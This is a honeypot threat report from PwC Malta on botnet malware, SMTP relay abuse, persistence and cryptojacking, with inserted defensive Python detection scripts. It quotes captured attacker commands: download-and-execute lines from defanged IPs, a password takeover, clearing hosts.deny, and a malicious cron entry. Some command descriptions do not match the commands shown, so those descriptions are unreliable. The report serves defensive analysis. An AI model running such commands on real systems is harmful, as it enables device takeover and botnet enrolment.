Unveiling the threat landscape:

Our insights from monitoring the Maltese cyber landscape

In the ever-evolving landscape of cyber security, understanding and mitigating threats is paramount. This article delves into the insights gathered from T-Pot, a sophisticated open-source honeypot framework, between August and October. The honeypot is designed to attract and analyse cyber threats. Our PwC Cyber Security & Privacy team deployed an in-house instance of T-Pot in our Maltese offices. T-Pot consists of multiple decoy systems that mimic real computer environments, luring attackers into a controlled and monitored setup. By capturing and studying the actions of these attackers, T-Pot provides invaluable data that helps us understand cyber threats specifically targeting and affecting the Maltese islands. During our observations, we recorded well over 6 million attacks, of which over 5 million were Distributed Denial of Service (DDoS) packets.

In Malta's digital landscape, the greatest threat to our security is the illusion that we are secure

Observations and Emerging Risks

Based on the data collected from our T-Pot honeypot, we observed several significant threats targeting exposed services. These threats highlight the evolving tactics used by attackers to compromise systems. The key threats identified include:

Compromise of IoT Devices

Attempts to deploy malware which targets IoT devices to enrol them in the Mirai botnet for use in DDoS attacks. IoT devices often have weak security configurations, making them prime targets for such attacks.

Credential Theft and Privilege Escalation

Efforts to manipulate passwords, indicating attempts to gain elevated access and compromise multiple accounts. This can result in attackers gaining administrative control over systems, leading to further exploitation.

Persistence Mechanisms

Ensuring payloads are reinstalled or activated even after system reboots or cleanup attempts. This allows attackers to maintain long-term access and control over the compromised systems.

Malware Deployment

Attempts to deploy various types of malware, including those used to facilitate enrolment to the GAFGYT and Mirai botnets. This can lead to further compromise.

Phishing Attempts via SMTP Relay Attacks

Potential phishing attempts using exposed relay services to send emails, leveraging ‘trusted’ infrastructure for malicious email distribution. This can lead to significant reputational damage and potential blacklisting of the mail server’s IP address.

Cryptojacking

Attempts to identify and terminate competing cryptocurrency mining processes, indicating that attackers are deploying cryptojacking malware to hijack system resources for mining cryptocurrencies.

Table of observed commands

Below is a table listing all the commands observed, along with brief descriptions of their functions:

Command: cat /proc/cpuinfo
Description: Displays detailed information about the CPU(s) on the system, including model name, clock speed, cache size and number of cores. This information helps an attacker understand the hardware capabilities of a compromised system, allowing them to optimise their malicious payloads or judge the system's suitability for resource-intensive tasks such as cryptocurrency mining.

Command: lscpu
Description: Displays detailed information about the CPU architecture, which threat actors can use to understand the system's hardware capabilities and tailor their exploits accordingly.

Command: rm .s; wget http://195[.]158[.]71[.]23:50373/.i; chmod 777 .i; ./.i; exit
Description: This command sequence removes any existing ssh.sh file and attempts to download a new version using multiple methods (wget, curl and TFTP). This redundancy ensures the script's retrieval regardless of the packages available on the device. Once downloaded, it sets the script's permissions to be fully executable and runs it with ssh as an argument. Finally, it deletes the script to erase traces of the attack. The downloaded script has been associated with malware specifically targeting IoT devices for DDoS attacks.

Command: rm -rf ssh.sh; wget http://87[.]121[.]112[.]42/ssh[.]sh
Description: Similar to the command above, we observed malicious payloads named 'ssh.sh' being downloaded. The IP address hosting the file has been flagged as malicious by various security vendors. Analysis of the payload reveals that it delivers a Mirai botnet payload.

Command: echo "Admin@2024\nQeqYQ3r65upv\nQeqYQ3r65upv\n" | passwd
Description: Pipes a new password into passwd to change the password of the current user. From a security perspective, it is a method of taking over the server and achieving persistence by setting a new password.

Command: ps | grep '[Mm]iner'
Description: Searches the process list for names containing "miner" or "Miner" (the bracket expression makes the first letter case-insensitive). This is most likely done to identify cryptocurrency mining processes already running on the system.

Command: echo > /etc/hosts.deny
Description: Empties /etc/hosts.deny, the TCP Wrappers deny list, clearing any existing host-based access restrictions.

Detailed Threat Analysis

GAFGYT Botnet 

The Mirai botnet is a well-known malware strain that targets IoT devices, infecting them to execute DDoS attacks. The script downloaded from http://37[.]44[.]238[.]67/bins[.]sh is associated with the GAFGYT botnet. These scripts are designed to create hidden files, manipulate system configurations, and evade detection, aligning with typical botnet behaviour.

Recent versions of Gafgyt also incorporate a brute-force telnet scanner, copied from Mirai, as well as the GPON exploit (CVE-2018-10561), which is used to bypass authentication on vulnerable Dasan GPON routers. 

IoT botnets like Gafgyt are constantly evolving. In March, for example, researchers reported what they described as the first Gafgyt variant to hide its activity behind the Tor network. Botnets are therefore a threat that should not be ignored.

Source: https://truxgoservers.com/blog/gafgyt-is-a-botnet-that-uses-mirai-ddos-modules/

Mirai Botnet

The Mirai botnet is infamous for infecting Internet of Things (IoT) devices by exploiting default credentials, transforming them into a network of bots used for large-scale DDoS attacks. In contrast, the GAFGYT botnet, also known as BASHLITE, targets IoT devices by exploiting known vulnerabilities in devices like Huawei and Realtek routers. While both botnets are used for DDoS attacks, Mirai is particularly notable for its massive impact and the public release of its source code in 2016, which led to numerous variants, whereas GAFGYT has its own distinct set of exploits and has been active since 2014.

The Mirai botnet primarily targets devices running on architectures such as ARM, MIPS, and x86. Once a device is compromised, it connects to a command-and-control (C2) server, which can issue commands to launch DDoS attacks.

The infection process typically involves the following steps:

The infected device scans the network for other devices with open Telnet or SSH ports.

The malware attempts to log in using a list of default or commonly used credentials.

Once access is gained, the malware downloads and executes the main payload.

The infected device connects to the C2 server to receive instructions.

The malware continues to scan and infect other devices.

From the chain of commands shown below, we determined that the first script enumerates the architecture of the device and, once that is known, downloads the next stage built for that specific architecture. That stage then captures the device and enrols it in the Mirai botnet.

Below is the chain of commands that was discovered:

This sequence begins by removing any existing ssh.sh file before attempting to download a new version using multiple methods, including wget, curl, and TFTP. This redundancy ensures successful retrieval regardless of the packages installed on the target device.

Once downloaded, the script sets its permissions to be fully executable, runs it with ssh as an argument, and subsequently deletes the script to cover its tracks. The script, available at http://87[.]121[.]112[.]42/ssh[.]sh, first identifies the system's binary architecture (such as MIPS, x86, ARM) and downloads the appropriate version before executing it.

The versatility and multi-method approach of this malware reflects the sophistication of the threat actor observed, indicating a targeted effort to exploit a broad range of systems. This level of sophistication underscores the importance of robust measures to detect and mitigate such threats.
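To show how a defender can triage commands of the kind listed in the table of observed commands and in the ssh.sh chain described above, the following Python script is added here; it is not PwC's or T-Pot's code. It tags each captured command with the categories the article uses and extracts the download hosts as defanged indicators. The rule names and patterns are assumptions; the sample session is constructed from the commands quoted on this page, with the IP addresses left defanged so nothing resolves.

```python
"""Triage shell commands captured by an SSH/Telnet honeypot such as T-Pot's Cowrie.

Added example, not code from PwC or the T-Pot project. Category names and
rules are assumptions chosen to mirror the article's table; the sample
session is constructed from the commands quoted on the page, with the IP
addresses left defanged (195[.]158[.]71[.]23) so nothing here resolves.
"""
import re
from collections import Counter
from dataclasses import dataclass

# A URL whose host may be defanged with "[.]"; the path stops at shell separators.
URL_RE = re.compile(r"https?://[\w\[\]\.\-]+(?::\d+)?(?:/[^\s;|&]*)?")
HOST_RE = re.compile(r"https?://([^/:]+)")

# (category, pattern). A single command can match more than one category.
RULES = [
    ("recon",             re.compile(r"\b(cat /proc/cpuinfo|lscpu|uname -[a-z]+)\b")),
    ("download",          re.compile(r"\b(wget|curl|tftp)\b")),
    ("execute",           re.compile(r"\bchmod\b|[;&|]\s*\./")),
    ("credential_change", re.compile(r"\bpasswd\b")),
    ("miner_check",       re.compile(r"\bgrep\b.*\[Mm\]iner")),
    ("access_control",    re.compile(r">\s*/etc/hosts\.deny")),
    ("cleanup",           re.compile(r"(^|[;&|]\s*)rm\b")),
]


@dataclass
class Finding:
    command: str
    categories: list
    urls: list


def classify(command: str) -> Finding:
    """Tag one captured command and pull out any download URLs it references."""
    categories = [name for name, rx in RULES if rx.search(command)]
    urls = URL_RE.findall(command)
    return Finding(command, categories, urls)


def host_of(url: str) -> str:
    """Return the (still defanged) host part of a URL for IoC reporting."""
    m = HOST_RE.match(url)
    return m.group(1) if m else ""


def session_summary(commands):
    """Count categories across a session and list the distinct download hosts."""
    findings = [classify(c) for c in commands]
    counts = Counter(cat for f in findings for cat in f.categories)
    hosts = sorted({host_of(u) for f in findings for u in f.urls})
    return findings, counts, hosts


# Constructed session built from the commands quoted in the article.
SAMPLE_SESSION = [
    "cat /proc/cpuinfo",
    "lscpu",
    "rm .s; wget http://195[.]158[.]71[.]23:50373/.i; chmod 777 .i; ./.i; exit",
    "rm -rf ssh.sh; wget http://87[.]121[.]112[.]42/ssh[.]sh",
    'echo "Admin@2024\\nQeqYQ3r65upv\\nQeqYQ3r65upv\\n" | passwd',
    "ps | grep '[Mm]iner'",
    "echo > /etc/hosts.deny",
]

if __name__ == "__main__":
    findings, counts, hosts = session_summary(SAMPLE_SESSION)
    for f in findings:
        print(f"{', '.join(f.categories) or 'unclassified':<28} {f.command}")
    print("\ncategory counts:", dict(counts))
    print("download hosts (defanged):", hosts)
```

Running the script over a whole Cowrie session in this way turns a list of raw commands into the category counts and the download hosts that a SOC analyst would put into a ticket; a session that scores on download, execute and cleanup in one line is the drop-and-run pattern the article describes.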

Observed DoS Attacks

We also observed thousands of repeated requests from our device towards a specific domain, indicating a probable Denial of Service (DoS) attack. The attackers appeared to be probing services on a website from a source IP address originating in Russia. These repeated requests were likely an attempt at denial of service, using several different referrers to lend the traffic an appearance of 'legitimacy'.

SMTP Relay Attacks

There are two types of SMTP relay services – public and authenticated.

  • Public SMTP relay services are typically offered by ISPs and allow anyone to send emails through their network without the need for any authentication. While this may sound convenient, it can also be quite dangerous as it opens up the possibility of abuse, such as spamming.

  • Authenticated SMTP relay services, on the other hand, require users to provide some form of credentials, usually a username and password, in order to use the service. This authentication step helps to prevent abuse and ensures that only authorised users are able to send emails through the service.

SMTP relay attacks involve exploiting mail servers to send large volumes of spam or phishing emails. Attackers can use vulnerable systems to relay emails, masking their often malicious traffic with the server's legitimate traffic, relying on the company’s reputation. This can lead to significant reputational damage and potential blacklisting of the mail server’s IP address.

The observed email addresses indicate possible phishing attempts whereby the attacker is impersonating a third-party domain to attack the target. The domain was registered in 1997 by Xin Net Technology Corporation and has been attributed to malicious activities in the past, namely scams. Attackers often use compromised SMTP servers to send phishing emails, which can contain malicious links or attachments. These emails are designed to trick recipients into revealing sensitive information or downloading malware. The use of multiple recipient addresses suggests a broad phishing campaign aimed at harvesting credentials or spreading malware.

The process typically involves:

Configuration

The attacker configures the server to relay emails to a large list of recipients.

Email Crafting

 Phishing emails are crafted to appear legitimate, often mimicking trusted entities.

Distribution

The emails are sent out in bulk, aiming to reach as many recipients as possible.

Achieving the Objective

This phase largely depends on the attackers' intentions, which can vary from delivering a payload to creating a social engineering pretext. Depending on the intention and the outcome, the attacker may achieve the end objective (e.g., successfully distributing malware to targets via the leveraged SMTP server).
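As an added illustration of how the relay behaviour described in this section can be detected in a mail honeypot's logs (this is example code written for this article, not PwC's or T-Pot's), the following Python script flags any source that, without authenticating, sends mail from an external sender to several external recipients. The one-line-per-transaction log format, the LOCAL_DOMAINS set and the threshold are assumptions; the sample lines are constructed using RFC 5737 documentation addresses and reserved .test/.example domains.

```python
"""Spot SMTP relay abuse in honeypot mail-transaction logs.

Added example, not PwC's or T-Pot's code. The one-line-per-transaction
log format, the LOCAL_DOMAINS set and the threshold are assumptions; the
sample lines are constructed with RFC 5737 documentation addresses and
reserved .test/.example domains.
"""
import re
from collections import defaultdict

# Domains this server is allowed to accept mail for without authentication.
LOCAL_DOMAINS = {"honeypot.example"}
# Distinct external recipients from one source before we call it a relay campaign.
RELAY_THRESHOLD = 3

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) from=(?P<from>\S+) rcpt=(?P<rcpt>\S+) auth=(?P<auth>\S+)$"
)


def parse_line(line: str):
    """Return the fields of one transaction line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def is_relay_attempt(rec: dict) -> bool:
    """Unauthenticated mail from an external sender to an external recipient is
    a relay: the server would forward mail that is neither from nor for its own
    domains, which is exactly what an open relay lets a spammer do."""
    return (rec["auth"] == "none"
            and domain(rec["from"]) not in LOCAL_DOMAINS
            and domain(rec["rcpt"]) not in LOCAL_DOMAINS)


def find_relay_abuse(lines):
    """Group relay attempts by source IP; report sources over the threshold."""
    per_src = defaultdict(lambda: {"rcpts": set(), "senders": set()})
    for line in lines:
        rec = parse_line(line)
        if rec and is_relay_attempt(rec):
            per_src[rec["src"]]["rcpts"].add(rec["rcpt"].lower())
            per_src[rec["src"]]["senders"].add(rec["from"].lower())
    return {
        src: {"recipients": len(v["rcpts"]), "spoofed_senders": sorted(v["senders"])}
        for src, v in per_src.items()
        if len(v["rcpts"]) >= RELAY_THRESHOLD
    }


# Constructed sample: one bulk relay attempt, one legitimate inbound delivery,
# one authenticated submission and one malformed line.
SAMPLE_LOG = """\
2024-09-14T10:02:11Z src=198.51.100.7 from=billing@vendor-lookalike.test rcpt=ceo@target-one.test auth=none
2024-09-14T10:02:12Z src=198.51.100.7 from=billing@vendor-lookalike.test rcpt=cfo@target-one.test auth=none
2024-09-14T10:02:13Z src=198.51.100.7 from=billing@vendor-lookalike.test rcpt=hr@target-two.test auth=none
2024-09-14T10:02:13Z src=198.51.100.7 from=billing@vendor-lookalike.test rcpt=hr@target-two.test auth=none
2024-09-14T10:02:14Z src=198.51.100.7 from=billing@vendor-lookalike.test rcpt=it@target-three.test auth=none
2024-09-14T10:05:40Z src=203.0.113.9 from=alice@partner.test rcpt=helpdesk@honeypot.example auth=none
2024-09-14T10:06:02Z src=192.0.2.5 from=bob@honeypot.example rcpt=carol@partner.test auth=plain
garbage line that should be ignored
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()

if __name__ == "__main__":
    for src, info in find_relay_abuse(SAMPLE_LINES).items():
        print(f"{src}: {info['recipients']} distinct external recipients, "
              f"sender(s) {info['spoofed_senders']}")
```

The inbound message to helpdesk@honeypot.example and the authenticated submission are both left alone: the check is specifically external-to-external without credentials, which is the one combination a correctly configured mail server should never accept.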

Honeypots have been making use of AI-driven tools to detect more convincing phishing emails, making it harder for attackers to fool end-users with malicious messages that may appear legitimate.

Persistence

Attackers often use cron jobs to maintain persistence on a compromised system. By injecting malicious entries into the crontab, they ensure that their payloads are reinstalled or activated even after a system reboot or cleanup attempt. The crontab command, found in Unix and Unix-like operating systems, is used to schedule commands to be executed periodically, similar to the Windows Scheduler. This allows them to maintain control over the system and continue their malicious activities.

Persistence mechanisms are crucial for attackers to maintain long-term access to compromised systems. By leveraging cron jobs, attackers can schedule scripts to run at regular intervals, ensuring their malware remains active. 

For example, a cron job entry like "* * * * * /path/to/malicious/script.sh" would execute the script every minute. This script could download additional payloads, exfiltrate data, or establish a reverse shell for remote access.

Cryptojacking

Cryptojacking involves hijacking a system’s resources to mine cryptocurrencies without the owner’s consent. The presence of commands like ps | grep '[Mm]iner' and ps -ef | grep '[Mm]iner' suggests attempts to identify and terminate competing cryptocurrency mining processes, indicating that attackers are deploying cryptojacking malware.

Cryptojacking malware typically infects a system and uses its CPU and GPU resources to mine cryptocurrencies such as Bitcoin or Monero. This can significantly degrade system performance and increase electricity costs. Attackers often use sophisticated techniques to hide their mining activities, such as running processes under legitimate system names or using rootkits to avoid detection.

The process typically involves:

Infection

The attacker gains access to the system through phishing, exploiting vulnerabilities, or using brute force attacks.


Deployment

The cryptojacking malware is downloaded and executed, often using commands like wget or curl.

Mining

The malware starts mining cryptocurrency, using the system’s resources.

Persistence

The attacker ensures the malware remains active by using persistence mechanisms such as cron jobs or modifying system binaries.

Data from the SANS Internet Storm Center indicates that cryptojacking attacks are on the rise, with attackers increasingly targeting cloud environments and containerised applications. Honeypots have detected sophisticated cryptojacking campaigns that use multiple layers of obfuscation and encryption to avoid detection.

Recently the SANS Internet Storm Center reported that they discovered a cryptojacking malware mining Monero known as the Pro Ocean cryptojacking malware. The Pro Ocean cryptojacking script exploits known vulnerabilities in software such as Apache ActiveMQ and Oracle WebLogic, as well as unsecured Redis instances, to target servers hosted within cloud providers, particularly Chinese providers like Tencent and Alibaba. Once the malware has infected a system, it not only terminates any competing malware but also halts any legitimate software that consumes significant CPU resources. This unusual behaviour could be considered an Indicator of Compromise (IoC) and thus reveal the presence of such malware.

Tying this back to our local observations, where checks were made for any process with 'Miner' or 'miner' in its name, this could be cryptojacking malware looking to identify whether similar malware is already executing on the compromised system.
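The attacker's own `ps | grep '[Mm]iner'` check is a crude version of what a defender can do better. The following Python script is an added example (not PwC's or T-Pot's code) that goes beyond the name match: it parses the output of `ps -eo pid,user,pcpu,args`, scores each process on mining-pool URLs, common miner command-line flags and binaries running from world-writable directories, and uses high CPU only as corroboration rather than as an indicator on its own, so a busy database is not flagged. The indicator list, the CPU threshold and the sample listing are all constructed assumptions.

```python
"""Find cryptomining processes in a process listing.

Added example, not PwC's or T-Pot's code. It expects the output of
`ps -eo pid,user,pcpu,args` and treats sustained high CPU as corroboration
only; indicator patterns, threshold and the sample listing are assumptions.
"""
import re

PS_LINE_RE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<cpu>[\d.]+)\s+(?P<args>.+)$")

INDICATORS = [
    ("name-contains-miner", re.compile(r"miner", re.I)),
    ("stratum-pool-url",    re.compile(r"stratum\+(tcp|ssl)://", re.I)),
    ("miner-style-flags",   re.compile(r"--donate-level|--algo\b|(^|\s)-o\s+\S+:\d+")),
    ("runs-from-temp",      re.compile(r"^(/tmp|/dev/shm|/var/tmp)/")),
]
CPU_THRESHOLD = 80.0  # percent; assumption


def parse_ps(text: str):
    """Parse `ps -eo pid,user,pcpu,args` output (header line skipped) into dicts."""
    procs = []
    for line in text.splitlines()[1:]:
        m = PS_LINE_RE.match(line)
        if m:
            procs.append({"pid": int(m["pid"]), "user": m["user"],
                          "cpu": float(m["cpu"]), "args": m["args"].strip()})
    return procs


def assess(proc: dict):
    """Reasons a process looks like a miner; high CPU alone is never enough."""
    reasons = [name for name, rx in INDICATORS if rx.search(proc["args"])]
    if reasons and proc["cpu"] >= CPU_THRESHOLD:
        reasons.append("sustained-high-cpu")
    return reasons


def find_miners(text: str):
    """Return [(pid, args, reasons)] for every process with at least one reason."""
    hits = []
    for proc in parse_ps(text):
        reasons = assess(proc)
        if reasons:
            hits.append((proc["pid"], proc["args"], reasons))
    return hits


# Constructed listing: a miner hiding under a kernel-thread name in /tmp,
# an openly named miner, and a legitimately busy database that must not match.
SAMPLE_PS = """\
  PID USER     %CPU COMMAND
    1 root      0.0 /sbin/init
  842 www-data  2.1 nginx: worker process
 1337 nobody   97.5 /tmp/.X11-unix/kthreadd -o pool.example.test:3333 --donate-level 1
 2048 postgres 61.0 postgres: checkpointer
 3101 root     88.0 /usr/local/bin/cpuminer -a scrypt -o stratum+tcp://pool.example.test:3333
"""

if __name__ == "__main__":
    for pid, args, reasons in find_miners(SAMPLE_PS):
        print(f"pid {pid}: {args}\n    -> {', '.join(reasons)}")
```

The process masquerading as kthreadd is the case the article warns about (a miner "running under a legitimate system name"): a name-only grep misses it, while the pool argument and the /tmp path catch it.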

Contact us

Michel Ganado

Digital Services Leader, PwC Malta

Tel: +356 2564 7091

Andrew Schembri

Digital Services Partner, PwC Malta

Tel: +356 79211355

Kirsten Cremona

Senior Manager, Digital Services, PwC Malta

Tel: +356 7975 6911
